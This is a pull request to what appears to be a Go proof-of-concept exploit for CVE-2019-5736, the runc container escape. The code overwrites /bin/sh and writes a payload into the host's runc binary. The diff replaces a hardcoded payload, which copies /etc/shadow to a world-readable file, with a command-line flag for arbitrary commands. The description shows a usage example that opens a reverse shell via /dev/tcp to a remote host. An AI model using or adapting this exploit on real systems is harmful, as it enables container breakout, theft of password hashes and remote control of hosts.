### PR TITLE
add command line parameters

### DIFF
--- a/main.go
+++ b/main.go
@@ -12,10 +12,17 @@ import (
 	"strings"
 )
 
-// This is the line of shell commands that will execute on the host
-var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"
+
+var shellCmd string
+
+func init() {
+	flag.StringVar(&shellCmd, "shell", "", "Execute arbitrary commands")
+	flag.Parse()
+}
 
 func main() {
+	// This is the line of shell commands that will execute on the host
+	var payload = "#!/bin/bash \n" + shellCmd
 	// First we overwrite /bin/sh with the /proc/self/exe interpreter path
 	fd, err := os.Create("/bin/sh")
 	if err != nil {
@@ -70,6 +77,7 @@ func main() {
 		writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
 		if int(writeHandle.Fd()) > 0 {
 			fmt.Println("[+] Successfully got write handle", writeHandle)
+			fmt.Println("[+] The command executed is" + payload)
 			writeHandle.Write([]byte(payload))
 			return
 		}


### PR DESCRIPTION
Added -shell parameter
In this way, the user does not have to recompile each time the command is executed.
./CVE-2019-5736-PoC -shell "bash -i >& /dev/tcp/xx.xx.xx.xx/8965 0>&1"